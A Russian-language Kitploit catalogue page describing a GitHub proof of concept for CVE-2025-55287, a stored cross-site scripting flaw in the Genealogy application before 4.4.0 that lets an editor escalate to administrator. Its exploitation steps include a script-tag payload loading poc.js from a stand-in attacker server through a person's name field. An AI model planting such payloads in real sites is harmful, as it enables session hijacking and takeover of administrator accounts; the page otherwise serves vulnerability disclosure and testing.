Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/eternalvalhalla/cve-2025-55287-poc
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubeternalvalhalla/cve-2025-55287-poc

CVE-2025-55287-POC

Авторизованное сохраненное XSS-повышение привилегий PoC. Затрагивает версии Genealogy до 4.4.0.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
111 год назадЕщё не проверено

CVE-2025-55287-POC

Межсайтовый скриптинг (XSS) с сохранением в приложении Genealogy до версии 4.4.0 позволяет выполнение произвольного JavaScript и повышение привилегий от роли Editor+ до администратора.

Сводка
  • Тип уязвимости: Stored Cross-Site Scripting (CWE-79)
  • Затрагиваемый компонент: «Person» (имя и фамилия)
  • Затрагиваемые версии: все версии до 4.4.0
  • Воздействие: постоянное выполнение JavaScript, предоставленного атакующим, в браузерах жертв; перехват сеанса, CSRF через DOM, подмена интерфейса, кража учётных данных или произвольные действия от имени жертвы.
  • Вектор атаки: аутентифицированный пользователь (любая роль, позволяющая создавать новых лиц — editor+)
Эксплуатация

Корневая причина: недостаточная серверная санитизация/кодирование имени/фамилии лица при последующем удалении этого лица пользователем с более высокими привилегиями.

PoC:

  1. Выполните аутентификацию в приложении (роль editor+).
  2. Создайте новое лицо (не обязательно назначать его в какую-либо семью).
  3. Внедрите JavaScript-код в поле имени или фамилии созданного лица: <script src='yourserver/poc.js'></script>
  4. Отредактируйте poc.js, указав свой адрес электронной почты в соответствующем месте.
  5. Как только привилегированный пользователь попытается удалить это лицо, вы получите приглашение на платформу на указанный адрес с ролью администратора.
Скачать инструмент